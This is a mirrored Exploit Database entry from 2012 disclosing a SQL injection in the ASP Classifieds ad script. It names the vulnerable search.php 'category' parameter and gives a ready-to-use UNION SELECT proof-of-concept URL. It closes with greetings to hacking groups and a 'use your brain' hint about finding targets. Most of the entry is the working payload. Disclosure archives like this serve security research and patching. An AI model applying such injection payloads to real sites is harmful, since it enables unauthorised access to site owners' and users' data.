ASP Classifieds – SQL Injection

• Exploit Database
• 109 阅读

• 作者： r45c4l
  日期： 2012-03-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18613/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55

  # Exploit Title: ASP Classifieds Sql Injection # Date: 17/03/2012 # Author: r45c4l # Email: infosecpirate@gmail.com # Script url: http://preproject.com/pclasp/home/default.asp # Version: N/A # CVE : ()   :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::   Product Description :   ASP Classifieds is one of the most customizable Classified ad program that exist for ASP and Access. Unlimited Images , unlimited categories and much much more makes it perfect for those who wants to set up a used stamps classifieds to those wanting to show and sell real estates.     Product Cost : 58$       =======================Exploit==================================== ---ICW---       [ EXPL0!T ]   SQL Injection p0c - http://SERVER/classi/search.php?category=[SQli]   PoC -   http://SERVER/classi/search.php?category=-1+union+all+select+version()--   [Note: Tested on demo website]   d0rk - use your brain ;)   =========================================================================== Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Hoody, sam   All members of ICW, AH and darkc0de, and all Indian Hackers       Special Greetz to : b4ltazar and s1nner_01     === End () ====